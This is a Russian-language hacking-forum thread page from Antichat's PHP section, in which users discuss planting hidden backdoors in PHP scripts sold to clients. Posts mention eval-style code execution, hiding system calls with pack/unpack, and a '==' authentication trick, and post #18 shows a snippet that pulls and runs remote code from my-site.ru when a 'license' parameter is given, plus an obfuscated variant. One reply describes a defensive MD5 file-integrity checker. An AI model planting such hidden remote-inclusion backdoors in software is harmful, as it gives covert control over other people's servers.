ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.11.2006, 18:01
Аватар для bopoh13
bopoh13
Участник форума
Регистрация: 31.10.2006
Сообщений: 212
Провел на форуме:
1073612

Репутация: 50
Smile

Цитата:
Сообщение от Green_Bear  
Молодец, +.
Добавил в карту статей.
Ты так быстро работоспособность проверил Я удивлен!
 
Ответить с цитированием

  #12  
Старый 01.12.2006, 20:22
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Мб кинуть это в статьи? оч. достойно
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #13  
Старый 01.12.2006, 20:48
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

дык кинул уже в карту.
 
Ответить с цитированием

  #14  
Старый 30.04.2009, 19:34
Аватар для PaCo
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

А какие еще варианты(функции, языковые конструкции ) выполнить php код из текста кроме eval , preg_replace /e,ну и в некоторыйх случаях create_function() ?
 
Ответить с цитированием

  #15  
Старый 03.05.2009, 13:19
Аватар для Krist_ALL
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

В журнале хакер была статья "неслучайные баги". Там как раз на эту темы. Еще было написано,как авторизоватся,если скрипт писал ты а тебя типа кинул заказчик на деньги,а скрипт забрал. Неслучайный баг был в == вместо ===. Очень интересная тема,ТС! +1!
 
Ответить с цитированием

  #16  
Старый 03.05.2009, 14:17
Аватар для Gar|k
Gar|k
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме:
991929

Репутация: 395


По умолчанию

эм я это на какомто стороннем сайте читал... может стырили хз, там правда был еще доработан генератор запутаного кода )

мы подобное реализовали в комерческом движке но файл был не лицензии а обычный php фейковая проверка валидности движка ))) хех
 
Ответить с цитированием

  #17  
Старый 03.05.2009, 16:14
Аватар для Krist_ALL
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Можно еще unpack(xxx) где xxx = запакованая строка system('ls'),с помощью функции pack, хотя unpack(xxx) это слишком большое палево... Вот в яваскрипте с этим проблем нет. Там большой простор для фантазии!
 
Ответить с цитированием

хм
  #18  
Старый 02.08.2009, 18:09
Аватар для phpdreamer
phpdreamer
Постоянный
Регистрация: 26.07.2009
Сообщений: 321
Провел на форуме:
444589

Репутация: 123
Отправить сообщение для phpdreamer с помощью ICQ
По умолчанию хм

а вот я возьму такой код
PHP код:
if (isset ($_GET[license]))   {  include 'http://my-site.ru/license.txt';  exit();  }; 
и запуше его так
PHP код:
$file_name_="license.txt";
$userID="lude";
$suPPort="my-site.ru";
$arsia="inc";
if (isset (
$_GET[license])) 
{
eval(
$arsia.$userID."\'http://".$suPPort."/".$file_name_);
exit();
}; 
и чем хуже?
 
Ответить с цитированием

  #19  
Старый 02.08.2009, 18:24
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от phpdreamer  
а вот я возьму такой код
PHP код:
if (isset ($_GET[license]))   {  include 'http://my-site.ru/license.txt';  exit();  }; 
и запуше его так
PHP код:
$file_name_="license.txt";
$userID="lude";
$suPPort="my-site.ru";
$arsia="inc";
if (isset (
$_GET[license])) 
{
eval(
$arsia.$userID."\'http://".$suPPort."/".$file_name_);
exit();
}; 
и чем хуже?
Это если чесно какаято поебень.Я вообще хз как сейчаС,но просто наросто использую росто самописный скрипт,который по крону за в 30мин проверяет все файлы в папкх,их сумму мд5,имена,и сравниват с первой проверкой.Если все совпадает - то молчком,а если нет - подозрительный файл переименовываеться,и отправляеться в другую папку с .htaccess.Все это видно в админке,и действия можно отменить,если файл наш =) родной.Так что по сути,такай вот запарка с кодом не пройдет.
 
Ответить с цитированием

  #20  
Старый 03.08.2009, 02:08
Аватар для [n]-c0der
[n]-c0der
Участник форума
Регистрация: 03.02.2009
Сообщений: 104
Провел на форуме:
270228

Репутация: 70
По умолчанию

Цитата:
Сообщение от m0Hze  
Это если чесно какаято поебень.Я вообще хз как сейчаС,но просто наросто использую росто самописный скрипт,который по крону за в 30мин проверяет все файлы в папкх,их сумму мд5,имена,и сравниват с первой проверкой.Если все совпадает - то молчком,а если нет - подозрительный файл переименовываеться,и отправляеться в другую папку с .htaccess.Все это видно в админке,и действия можно отменить,если файл наш =) родной.Так что по сути,такай вот запарка с кодом не пройдет.
Поебень ваши посты сейчас, посмотрите какого года тема...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Коды состояния HTTP - Коды ошибок http сервера D=P=CH= MOD= *nix 6 15.10.2006 20:47
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ